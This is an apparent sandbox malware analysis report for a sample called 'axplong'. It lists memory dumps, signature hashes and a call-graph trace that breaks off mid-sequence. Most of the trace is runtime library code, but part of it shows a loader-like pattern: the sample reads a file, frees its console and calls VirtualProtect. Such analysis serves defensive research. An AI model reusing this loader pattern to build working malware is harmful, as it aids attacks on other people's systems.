                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @.g
                                                                                                                                                                                                                                                    • API String ID: 1432671424-1460316421
                                                                                                                                                                                                                                                    • Opcode ID: 8f9007bd953d705fe5a4f994f14d7b153dc451e3f712881f5725d72eb53358cb
                                                                                                                                                                                                                                                    • Instruction ID: 23399c10c575e542cd2c40d5e2b745055e7cb16b1d8bfeddc170e5a0ea6f1feb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f9007bd953d705fe5a4f994f14d7b153dc451e3f712881f5725d72eb53358cb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD012B68026115BC764FF90A801C877BDEFE063103410D5EF4D197601EBB0A5588BA4

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:4.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:1%
                                                                                                                                                                                                                                                    Total number of Nodes:1993
                                                                                                                                                                                                                                                    Total number of Limit Nodes:22
                                                                                                                                                                                                                                                    execution_graph 15125 46884f 15126 46bbb9 ___scrt_uninitialize_crt 68 API calls 15125->15126 15127 468857 15126->15127 15135 470cde 15127->15135 15129 46885c 15145 470d89 15129->15145 15132 468886 15133 46e4f7 ___free_lconv_mon 14 API calls 15132->15133 15134 468891 15133->15134 15136 470cea ___scrt_is_nonwritable_in_current_image 15135->15136 15149 46b750 EnterCriticalSection 15136->15149 15138 470d61 15154 470d80 15138->15154 15140 470cf5 15140->15138 15141 470d35 DeleteCriticalSection 15140->15141 15150 46ba11 15140->15150 15144 46e4f7 ___free_lconv_mon 14 API calls 15141->15144 15144->15140 15146 46886b DeleteCriticalSection 15145->15146 15147 470da0 15145->15147 15146->15129 15146->15132 15147->15146 15148 46e4f7 ___free_lconv_mon 14 API calls 15147->15148 15148->15146 15149->15140 15151 46ba24 _Fputc 15150->15151 15157 46bacf 15151->15157 15153 46ba30 _Fputc 15153->15140 15229 46b767 LeaveCriticalSection 15154->15229 15156 470d6d 15156->15129 15158 46badb ___scrt_is_nonwritable_in_current_image 15157->15158 15159 46bae5 15158->15159 15160 46bb08 15158->15160 15161 46b601 _Fputc 29 API calls 15159->15161 15162 46bb00 15160->15162 15168 46875f EnterCriticalSection 15160->15168 15161->15162 15162->15153 15164 46bb26 15169 46ba41 15164->15169 15166 46bb33 15183 46bb5e 15166->15183 15168->15164 15170 46ba71 15169->15170 15171 46ba4e 15169->15171 15173 46bc27 ___scrt_uninitialize_crt 64 API calls 15170->15173 15181 46ba69 15170->15181 15172 46b601 _Fputc 29 API calls 15171->15172 15172->15181 15174 46ba89 15173->15174 15175 470d89 14 API calls 15174->15175 15176 46ba91 15175->15176 15177 470efc __fread_nolock 29 API calls 15176->15177 15178 46ba9d 15177->15178 15186 474ff5 15178->15186 15181->15166 15182 46e4f7 ___free_lconv_mon 14 API calls 15182->15181 15228 468773 LeaveCriticalSection 15183->15228 15185 46bb64 15185->15162 15187 47501e 15186->15187 15192 46baa4 15186->15192 15188 47506d 15187->15188 15190 475045 15187->15190 15189 46b601 _Fputc 29 API calls 15188->15189 15189->15192 15193 475098 15190->15193 15192->15181 15192->15182 15194 4750a4 ___scrt_is_nonwritable_in_current_image 15193->15194 15201 474ef9 EnterCriticalSection 15194->15201 15196 4750b2 15197 4750e3 15196->15197 15202 474f55 15196->15202 15215 47511d 15197->15215 15201->15196 15203 474cb0 _Fputc 29 API calls 15202->15203 15205 474f65 15203->15205 15204 474f6b 15218 474d1a 15204->15218 15205->15204 15206 474f9d 15205->15206 15208 474cb0 _Fputc 29 API calls 15205->15208 15206->15204 15209 474cb0 _Fputc 29 API calls 15206->15209 15210 474f94 15208->15210 15211 474fa9 CloseHandle 15209->15211 15212 474cb0 _Fputc 29 API calls 15210->15212 15211->15204 15213 474fb5 GetLastError 15211->15213 15212->15206 15213->15204 15214 474fc3 __fread_nolock 15214->15197 15227 474f1c LeaveCriticalSection 15215->15227 15217 475106 15217->15192 15219 474d90 15218->15219 15220 474d29 15218->15220 15221 46ad6d __dosmaperr 14 API calls 15219->15221 15220->15219 15226 474d53 15220->15226 15222 474d95 15221->15222 15223 46ad80 __dosmaperr 14 API calls 15222->15223 15224 474d80 15223->15224 15224->15214 15225 474d7a SetStdHandle 15225->15224 15226->15224 15226->15225 15227->15217 15228->15185 15229->15156 16911 46416b 16912 46417f 16911->16912 16913 4643df 69 API calls 16912->16913 16918 4641da 16912->16918 16914 4641aa 16913->16914 16915 4641c7 16914->16915 16916 46ae1d 67 API calls 16914->16916 16914->16918 16915->16918 16919 46c01e 16915->16919 16916->16915 16920 46c03e 16919->16920 16921 46c029 16919->16921 16923 46c046 16920->16923 16924 46c05b 16920->16924 16922 46ad6d __dosmaperr 14 API calls 16921->16922 16926 46c02e 16922->16926 16927 46ad6d __dosmaperr 14 API calls 16923->16927 16933 474217 16924->16933 16929 46b458 __strnicoll 29 API calls 16926->16929 16930 46c04b 16927->16930 16928 46c056 16928->16918 16931 46c039 16929->16931 16932 46b458 __strnicoll 29 API calls 16930->16932 16931->16918 16932->16928 16934 47422b _Fputc 16933->16934 16937 4747c0 16934->16937 16936 474237 _Fputc 16936->16928 16938 4747cc ___scrt_is_nonwritable_in_current_image 16937->16938 16939 4747f6 16938->16939 16940 4747d3 16938->16940 16948 46875f EnterCriticalSection 16939->16948 16941 46b601 _Fputc 29 API calls 16940->16941 16944 4747ec 16941->16944 16943 474804 16949 47461f 16943->16949 16944->16936 16946 474813 16962 474845 16946->16962 16948->16943 16950 474656 16949->16950 16951 47462e 16949->16951 16953 470efc __fread_nolock 29 API calls 16950->16953 16952 46b601 _Fputc 29 API calls 16951->16952 16954 474649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16952->16954 16955 47465f 16953->16955 16954->16946 16956 474051 33 API calls 16955->16956 16957 47467d 16956->16957 16957->16954 16958 474709 16957->16958 16960 474720 16957->16960 16959 4742a9 34 API calls 16958->16959 16959->16954 16960->16954 16961 474454 33 API calls 16960->16961 16961->16954 16965 468773 LeaveCriticalSection 16962->16965 16964 47484d 16964->16944 16965->16964 15695 463e04 15696 463e10 __EH_prolog3_GS 15695->15696 15698 463e60 15696->15698 15699 463e79 15696->15699 15703 463e2a 15696->15703 15709 4635ba 15698->15709 15712 46bec9 15699->15712 15736 46535e 15703->15736 15705 463e98 15705->15703 15707 46bec9 45 API calls 15705->15707 15708 463f6d 15705->15708 15732 4633ee 15705->15732 15707->15705 15708->15703 15739 46cf47 15708->15739 15710 46bec9 45 API calls 15709->15710 15711 4635c5 15710->15711 15711->15703 15713 46bed5 ___scrt_is_nonwritable_in_current_image 15712->15713 15714 46bef7 15713->15714 15715 46bedf 15713->15715 15752 46875f EnterCriticalSection 15714->15752 15716 46ad6d __dosmaperr 14 API calls 15715->15716 15718 46bee4 15716->15718 15720 46b458 __strnicoll 29 API calls 15718->15720 15719 46bf02 15721 470efc __fread_nolock 29 API calls 15719->15721 15722 46bf1a 15719->15722 15731 46beef _Fputc 15720->15731 15721->15722 15723 46bf82 15722->15723 15724 46bfaa 15722->15724 15726 46ad6d __dosmaperr 14 API calls 15723->15726 15753 46bfe2 15724->15753 15728 46bf87 15726->15728 15727 46bfb0 15763 46bfda 15727->15763 15730 46b458 __strnicoll 29 API calls 15728->15730 15730->15731 15731->15705 15733 463422 15732->15733 15735 4633fe 15732->15735 15935 4646df 15733->15935 15735->15705 15737 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 15736->15737 15738 465368 15737->15738 15738->15738 15740 46cf53 ___scrt_is_nonwritable_in_current_image 15739->15740 15741 46cf6f 15740->15741 15742 46cf5a 15740->15742 15950 46875f EnterCriticalSection 15741->15950 15744 46ad6d __dosmaperr 14 API calls 15742->15744 15746 46cf5f 15744->15746 15745 46cf79 15951 46cfba 15745->15951 15748 46b458 __strnicoll 29 API calls 15746->15748 15749 46cf6a 15748->15749 15749->15708 15752->15719 15754 46c003 15753->15754 15755 46bfee 15753->15755 15757 46c012 15754->15757 15766 475d52 15754->15766 15756 46ad6d __dosmaperr 14 API calls 15755->15756 15758 46bff3 15756->15758 15757->15727 15760 46b458 __strnicoll 29 API calls 15758->15760 15762 46bffe 15760->15762 15762->15727 15934 468773 LeaveCriticalSection 15763->15934 15765 46bfe0 15765->15731 15767 475d5d 15766->15767 15768 475d6a 15767->15768 15772 475d82 15767->15772 15769 46ad6d __dosmaperr 14 API calls 15768->15769 15770 475d6f 15769->15770 15771 46b458 __strnicoll 29 API calls 15770->15771 15781 46c00f 15771->15781 15773 475de1 15772->15773 15772->15781 15787 477d00 15772->15787 15775 470efc __fread_nolock 29 API calls 15773->15775 15776 475dfa 15775->15776 15792 476144 15776->15792 15779 470efc __fread_nolock 29 API calls 15780 475e33 15779->15780 15780->15781 15782 470efc __fread_nolock 29 API calls 15780->15782 15781->15727 15783 475e41 15782->15783 15783->15781 15784 470efc __fread_nolock 29 API calls 15783->15784 15785 475e4f 15784->15785 15786 470efc __fread_nolock 29 API calls 15785->15786 15786->15781 15788 46f807 _unexpected 14 API calls 15787->15788 15789 477d1d 15788->15789 15790 46e4f7 ___free_lconv_mon 14 API calls 15789->15790 15791 477d27 15790->15791 15791->15773 15793 476150 ___scrt_is_nonwritable_in_current_image 15792->15793 15794 476158 15793->15794 15798 476173 15793->15798 15795 46ad80 __dosmaperr 14 API calls 15794->15795 15796 47615d 15795->15796 15797 46ad6d __dosmaperr 14 API calls 15796->15797 15821 475e02 15797->15821 15799 47618a 15798->15799 15800 4761c5 15798->15800 15801 46ad80 __dosmaperr 14 API calls 15799->15801 15803 4761e3 15800->15803 15804 4761ce 15800->15804 15802 47618f 15801->15802 15805 46ad6d __dosmaperr 14 API calls 15802->15805 15822 474ef9 EnterCriticalSection 15803->15822 15806 46ad80 __dosmaperr 14 API calls 15804->15806 15808 476197 15805->15808 15809 4761d3 15806->15809 15815 46b458 __strnicoll 29 API calls 15808->15815 15813 46ad6d __dosmaperr 14 API calls 15809->15813 15810 4761e9 15811 47621d 15810->15811 15812 476208 15810->15812 15823 47625d 15811->15823 15814 46ad6d __dosmaperr 14 API calls 15812->15814 15813->15808 15817 47620d 15814->15817 15815->15821 15819 46ad80 __dosmaperr 14 API calls 15817->15819 15818 476218 15886 476255 15818->15886 15819->15818 15821->15779 15821->15781 15822->15810 15824 476287 15823->15824 15825 47626f 15823->15825 15826 4765c9 15824->15826 15831 4762ca 15824->15831 15827 46ad80 __dosmaperr 14 API calls 15825->15827 15829 46ad80 __dosmaperr 14 API calls 15826->15829 15828 476274 15827->15828 15832 46ad6d __dosmaperr 14 API calls 15828->15832 15830 4765ce 15829->15830 15834 46ad6d __dosmaperr 14 API calls 15830->15834 15833 47627c 15831->15833 15835 4762d5 15831->15835 15841 476305 15831->15841 15832->15833 15833->15818 15836 4762e2 15834->15836 15837 46ad80 __dosmaperr 14 API calls 15835->15837 15839 46b458 __strnicoll 29 API calls 15836->15839 15838 4762da 15837->15838 15840 46ad6d __dosmaperr 14 API calls 15838->15840 15839->15833 15840->15836 15842 47631e 15841->15842 15843 47632b 15841->15843 15844 476359 15841->15844 15842->15843 15877 476347 15842->15877 15845 46ad80 __dosmaperr 14 API calls 15843->15845 15847 46e531 __strnicoll 15 API calls 15844->15847 15846 476330 15845->15846 15848 46ad6d __dosmaperr 14 API calls 15846->15848 15850 47636a 15847->15850 15851 476337 15848->15851 15853 46e4f7 ___free_lconv_mon 14 API calls 15850->15853 15854 46b458 __strnicoll 29 API calls 15851->15854 15852 4764a5 15855 476519 15852->15855 15859 4764be GetConsoleMode 15852->15859 15856 476373 15853->15856 15885 476342 __fread_nolock 15854->15885 15858 47651d ReadFile 15855->15858 15857 46e4f7 ___free_lconv_mon 14 API calls 15856->15857 15860 47637a 15857->15860 15861 476535 15858->15861 15862 476591 GetLastError 15858->15862 15859->15855 15863 4764cf 15859->15863 15864 476384 15860->15864 15865 47639f 15860->15865 15861->15862 15868 47650e 15861->15868 15866 4764f5 15862->15866 15867 47659e 15862->15867 15863->15858 15869 4764d5 ReadConsoleW 15863->15869 15871 46ad6d __dosmaperr 14 API calls 15864->15871 15889 473ff3 15865->15889 15878 46ad93 __dosmaperr 14 API calls 15866->15878 15866->15885 15872 46ad6d __dosmaperr 14 API calls 15867->15872 15881 476571 15868->15881 15882 47655a 15868->15882 15868->15885 15869->15868 15874 4764ef GetLastError 15869->15874 15870 46e4f7 ___free_lconv_mon 14 API calls 15870->15833 15875 476389 15871->15875 15876 4765a3 15872->15876 15874->15866 15879 46ad80 __dosmaperr 14 API calls 15875->15879 15880 46ad80 __dosmaperr 14 API calls 15876->15880 15893 478994 15877->15893 15878->15885 15879->15885 15880->15885 15881->15885 15915 47690a 15881->15915 15902 476666 15882->15902 15885->15870 15933 474f1c LeaveCriticalSection 15886->15933 15888 47625b 15888->15821 15890 474007 _Fputc 15889->15890 15921 474194 15890->15921 15892 47401c _Fputc 15892->15877 15894 4789a1 15893->15894 15895 4789ae 15893->15895 15896 46ad6d __dosmaperr 14 API calls 15894->15896 15897 4789ba 15895->15897 15898 46ad6d __dosmaperr 14 API calls 15895->15898 15899 4789a6 15896->15899 15897->15852 15900 4789db 15898->15900 15899->15852 15901 46b458 __strnicoll 29 API calls 15900->15901 15901->15899 15927 4767bd 15902->15927 15904 46e57f __strnicoll MultiByteToWideChar 15906 47677a 15904->15906 15908 4766ae 15906->15908 15909 476783 GetLastError 15906->15909 15907 4766f8 15910 46ad6d __dosmaperr 14 API calls 15907->15910 15908->15885 15911 46ad93 __dosmaperr 14 API calls 15909->15911 15910->15908 15911->15908 15912 476708 15913 4766c2 15912->15913 15914 473ff3 __fread_nolock 31 API calls 15912->15914 15913->15904 15914->15913 15916 476944 15915->15916 15917 4769da ReadFile 15916->15917 15918 4769d5 15916->15918 15917->15918 15919 4769f7 15917->15919 15918->15885 15919->15918 15920 473ff3 __fread_nolock 31 API calls 15919->15920 15920->15918 15922 474cb0 _Fputc 29 API calls 15921->15922 15923 4741a6 15922->15923 15924 4741c2 SetFilePointerEx 15923->15924 15926 4741ae __fread_nolock 15923->15926 15925 4741da GetLastError 15924->15925 15924->15926 15925->15926 15926->15892 15928 4767f1 15927->15928 15929 476862 ReadFile 15928->15929 15932 47667d 15928->15932 15930 47687b 15929->15930 15929->15932 15931 473ff3 __fread_nolock 31 API calls 15930->15931 15930->15932 15931->15932 15932->15907 15932->15908 15932->15912 15932->15913 15933->15888 15934->15765 15936 464793 15935->15936 15937 464703 15935->15937 15938 461860 std::ios_base::_Init 31 API calls 15936->15938 15942 4647f6 15937->15942 15939 464798 15938->15939 15941 464720 _Yarn _Deallocate 15941->15735 15943 464802 15942->15943 15944 464800 15942->15944 15945 464811 15943->15945 15946 46480a 15943->15946 15944->15941 15948 462952 codecvt 16 API calls 15945->15948 15947 46186a std::ios_base::_Init 31 API calls 15946->15947 15949 46480f 15947->15949 15948->15949 15949->15941 15950->15745 15952 46cfd2 15951->15952 15954 46d042 15951->15954 15953 470efc __fread_nolock 29 API calls 15952->15953 15957 46cfd8 15953->15957 15955 477d00 __fread_nolock 14 API calls 15954->15955 15956 46cf87 15954->15956 15955->15956 15962 46cfb2 15956->15962 15957->15954 15958 46d02a 15957->15958 15959 46ad6d __dosmaperr 14 API calls 15958->15959 15960 46d02f 15959->15960 15961 46b458 __strnicoll 29 API calls 15960->15961 15961->15956 15965 468773 LeaveCriticalSection 15962->15965 15964 46cfb8 15964->15749 15965->15964 17157 46430a 17158 464342 17157->17158 17159 464313 17157->17159 17159->17158 17162 46bb66 17159->17162 17161 464335 17163 46bb78 17162->17163 17165 46bb81 ___scrt_uninitialize_crt 17162->17165 17164 46bce4 ___scrt_uninitialize_crt 68 API calls 17163->17164 17166 46bb7e 17164->17166 17167 46bb90 17165->17167 17170 46be69 17165->17170 17166->17161 17167->17161 17171 46be75 ___scrt_is_nonwritable_in_current_image 17170->17171 17178 46875f EnterCriticalSection 17171->17178 17173 46be83 17174 46bbc2 ___scrt_uninitialize_crt 68 API calls 17173->17174 17175 46be94 17174->17175 17179 46bebd 17175->17179 17178->17173 17182 468773 LeaveCriticalSection 17179->17182 17181 46bbb7 17181->17161 17182->17181 13301 461614 GetPEB 13323 461098 13301->13323 13304 461680 GetFileSize 13307 461804 CloseHandle 13304->13307 13308 461694 13304->13308 13305 461828 13366 4629c6 13305->13366 13307->13305 13310 46169c ReadFile 13308->13310 13309 461836 13311 4617fb 13310->13311 13312 4616b9 CloseHandle 13310->13312 13311->13307 13320 4616d0 _Yarn _Deallocate _strlen 13312->13320 13322 4617f9 13312->13322 13314 461840 13373 461860 13314->13373 13316 461845 13375 46b468 13316->13375 13320->13314 13320->13316 13320->13322 13348 46186a 13320->13348 13354 462952 13320->13354 13334 46155c 13322->13334 13329 4610c1 _Yarn _Deallocate _strlen 13323->13329 13333 46120e 13323->13333 13324 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13325 461227 CreateFileA 13324->13325 13325->13304 13325->13305 13326 461231 13327 461860 std::ios_base::_Init 31 API calls 13326->13327 13328 461236 13327->13328 13330 46b468 std::ios_base::_Init 29 API calls 13328->13330 13329->13326 13329->13328 13331 46186a std::ios_base::_Init 31 API calls 13329->13331 13332 462952 codecvt 16 API calls 13329->13332 13329->13333 13330->13328 13331->13329 13332->13329 13333->13324 13335 461098 31 API calls 13334->13335 13336 461582 FreeConsole 13335->13336 13380 46123b 13336->13380 13339 46123b 104 API calls 13340 4615b9 13339->13340 13341 461098 31 API calls 13340->13341 13342 4615cc VirtualProtect 13341->13342 13343 4615f1 ExitProcess 13342->13343 13344 4615dd 13342->13344 13345 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13344->13345 13347 4615e7 13345->13347 13347->13305 13349 461873 13348->13349 13350 46188b 13348->13350 13351 462952 codecvt 16 API calls 13349->13351 14222 461890 13350->14222 13353 46187c 13351->13353 13353->13320 13356 462957 13354->13356 13355 46c994 ___std_exception_copy 15 API calls 13355->13356 13356->13355 13357 462971 13356->13357 13358 468f08 codecvt 2 API calls 13356->13358 13359 462973 13356->13359 13357->13320 13358->13356 13360 464a6f codecvt 13359->13360 13361 46297d Concurrency::cancel_current_task 13359->13361 13362 465aba Concurrency::cancel_current_task RaiseException 13360->13362 13363 465aba Concurrency::cancel_current_task RaiseException 13361->13363 13364 464a8b 13362->13364 13365 4631cf 13363->13365 13367 4629ce 13366->13367 13368 4629cf IsProcessorFeaturePresent 13366->13368 13367->13309 13370 464b7e 13368->13370 14227 464c64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13370->14227 13372 464c61 13372->13309 14228 4631d0 13373->14228 13376 46b6a7 __strnicoll 29 API calls 13375->13376 13377 46b477 13376->13377 13378 46b485 __Getctype 11 API calls 13377->13378 13379 46b484 13378->13379 13387 461263 13380->13387 13381 461355 13383 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13381->13383 13382 4612c2 KiUserExceptionDispatcher 13382->13387 13384 461363 13383->13384 13384->13339 13387->13381 13387->13382 13388 46136e 13387->13388 13404 461533 13387->13404 13389 46138d _strlen 13388->13389 13411 46197e 13389->13411 13391 461444 13415 46408b 13391->13415 13393 461515 13440 461a10 13393->13440 13396 4614c0 13425 461ab6 13396->13425 13397 4613ad 13397->13391 13397->13396 13419 4619d8 13397->13419 13399 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13401 461529 13399->13401 13400 461466 13400->13396 13402 4619d8 69 API calls 13400->13402 13401->13387 13402->13400 13897 4623c4 13404->13897 13409 461a3a 40 API calls 13410 461558 13409->13410 13410->13387 13412 461995 13411->13412 13413 4619a6 13412->13413 13444 461a3a 13412->13444 13413->13397 13416 46409a 13415->13416 13417 4640ad _Yarn 13415->13417 13416->13400 13417->13416 13454 46c578 13417->13454 13420 4619e5 13419->13420 13421 4619ee 13420->13421 13635 463c29 13420->13635 13644 463c1b 13420->13644 13657 463c0b 13420->13657 13421->13397 13426 461ad6 13425->13426 13427 461ae9 13425->13427 13428 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13426->13428 13429 461af9 13427->13429 13704 465aba 13427->13704 13431 461ae1 13428->13431 13707 461c57 13429->13707 13431->13393 13436 465aba Concurrency::cancel_current_task RaiseException 13437 461b3a 13436->13437 13718 461e48 13437->13718 13441 461a18 13440->13441 13442 46151e 13441->13442 13893 4622fe 13441->13893 13442->13399 13445 461aa2 13444->13445 13446 461a5a 13444->13446 13448 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13445->13448 13447 46197e 40 API calls 13446->13447 13449 461a64 13447->13449 13450 461aad 13448->13450 13451 461a9b 13449->13451 13453 461ab6 std::ios_base::_Init 40 API calls 13449->13453 13450->13413 13452 461a10 40 API calls 13451->13452 13452->13445 13453->13451 13455 46c58b _Fputc 13454->13455 13458 46c759 13455->13458 13457 46c5a0 _Fputc 13457->13416 13459 46c767 13458->13459 13464 46c78f 13458->13464 13460 46c796 13459->13460 13461 46c774 13459->13461 13459->13464 13466 46c81c 13460->13466 13474 46b601 13461->13474 13464->13457 13467 46c828 ___scrt_is_nonwritable_in_current_image 13466->13467 13483 46875f EnterCriticalSection 13467->13483 13469 46c836 13484 46c7d0 13469->13484 13475 46b611 13474->13475 13476 46b618 13474->13476 13574 468af0 GetLastError 13475->13574 13482 46b626 13476->13482 13578 46b67e 13476->13578 13479 46b64d 13479->13482 13581 46b485 IsProcessorFeaturePresent 13479->13581 13481 46b67d 13482->13464 13483->13469 13494 470bb7 13484->13494 13491 46c86b 13573 468773 LeaveCriticalSection 13491->13573 13493 46c7ce 13493->13457 13515 470c62 13494->13515 13496 470bc8 _Fputc 13497 46c7e8 13496->13497 13523 46e531 13496->13523 13501 46c5b2 13497->13501 13504 46c5c4 13501->13504 13510 46c5ed 13501->13510 13502 46c5d2 13503 46b601 _Fputc 29 API calls 13502->13503 13503->13510 13504->13502 13508 46c608 _Yarn 13504->13508 13504->13510 13508->13510 13536 46bc27 13508->13536 13542 470efc 13508->13542 13549 47549f 13508->13549 13560 475eec 13508->13560 13511 470ca0 13510->13511 13512 46c812 13511->13512 13513 470cab 13511->13513 13512->13491 13513->13512 13514 46bc27 ___scrt_uninitialize_crt 64 API calls 13513->13514 13514->13512 13517 470c6e _Fputc 13515->13517 13516 470c9c 13516->13496 13517->13516 13518 470c98 13517->13518 13519 470efc __fread_nolock 29 API calls 13517->13519 13518->13496 13520 470c89 13519->13520 13521 478994 __fread_nolock 29 API calls 13520->13521 13522 470c8f 13521->13522 13522->13496 13524 46e56f 13523->13524 13529 46e53f _unexpected 13523->13529 13525 46ad6d __dosmaperr 14 API calls 13524->13525 13527 46e56d 13525->13527 13526 46e55a RtlAllocateHeap 13526->13527 13526->13529 13530 46e4f7 13527->13530 13528 468f08 codecvt EnterCriticalSection LeaveCriticalSection 13528->13529 13529->13524 13529->13526 13529->13528 13531 46e502 HeapFree 13530->13531 13535 46e52c 13530->13535 13532 46e517 GetLastError 13531->13532 13531->13535 13533 46e524 __dosmaperr 13532->13533 13534 46ad6d __dosmaperr 12 API calls 13533->13534 13534->13535 13535->13497 13537 46bc40 13536->13537 13541 46bc67 13536->13541 13538 470efc __fread_nolock 29 API calls 13537->13538 13537->13541 13539 46bc5c 13538->13539 13540 47549f _Fputc 64 API calls 13539->13540 13540->13541 13541->13508 13543 470f1d 13542->13543 13544 470f08 13542->13544 13543->13508 13545 46ad6d __dosmaperr 14 API calls 13544->13545 13546 470f0d 13545->13546 13547 46b458 __strnicoll 29 API calls 13546->13547 13548 470f18 13547->13548 13548->13508 13550 4754ab ___scrt_is_nonwritable_in_current_image 13549->13550 13551 4754ec 13550->13551 13553 475532 13550->13553 13559 4754b3 13550->13559 13552 46b601 _Fputc 29 API calls 13551->13552 13552->13559 13554 474ef9 __fread_nolock EnterCriticalSection 13553->13554 13555 475538 13554->13555 13556 475556 13555->13556 13557 475283 _Fputc 62 API calls 13555->13557 13558 4755a8 _Fputc LeaveCriticalSection 13556->13558 13557->13556 13558->13559 13559->13508 13561 475f7c 13560->13561 13562 470efc __fread_nolock 29 API calls 13561->13562 13565 475f89 13562->13565 13563 475f95 13563->13508 13564 475fe1 13564->13563 13566 476043 13564->13566 13568 470c62 _Fputc 29 API calls 13564->13568 13565->13563 13565->13564 13567 475ef7 _Fputc 31 API calls 13565->13567 13569 476072 _Fputc 64 API calls 13566->13569 13567->13564 13570 476036 13568->13570 13571 476054 13569->13571 13570->13566 13572 477d00 __fread_nolock 14 API calls 13570->13572 13571->13508 13572->13566 13573->13493 13575 468b09 13574->13575 13585 46e985 13575->13585 13579 46b6a2 13578->13579 13580 46b689 GetLastError SetLastError 13578->13580 13579->13479 13580->13479 13582 46b491 13581->13582 13629 46b4b9 13582->13629 13586 46e998 13585->13586 13590 46e99e 13585->13590 13607 46f19b 13586->13607 13591 468b25 SetLastError 13590->13591 13612 46f1da 13590->13612 13591->13476 13594 46e9e5 13597 46f1da _unexpected 6 API calls 13594->13597 13595 46e9d0 13596 46f1da _unexpected 6 API calls 13595->13596 13598 46e9dc 13596->13598 13599 46e9f1 13597->13599 13603 46e4f7 ___free_lconv_mon 14 API calls 13598->13603 13600 46ea04 13599->13600 13601 46e9f5 13599->13601 13624 46ea94 13600->13624 13604 46f1da _unexpected 6 API calls 13601->13604 13603->13591 13604->13598 13606 46e4f7 ___free_lconv_mon 14 API calls 13606->13591 13608 46f534 _unexpected 5 API calls 13607->13608 13609 46f1b7 13608->13609 13610 46f1d2 TlsGetValue 13609->13610 13611 46f1c0 13609->13611 13611->13590 13613 46f534 _unexpected 5 API calls 13612->13613 13614 46f1f6 13613->13614 13615 46f214 TlsSetValue 13614->13615 13616 46e9b8 13614->13616 13616->13591 13617 46f807 13616->13617 13623 46f814 _unexpected 13617->13623 13618 46f854 13620 46ad6d __dosmaperr 13 API calls 13618->13620 13619 46f83f HeapAlloc 13621 46e9c8 13619->13621 13619->13623 13620->13621 13621->13594 13621->13595 13622 468f08 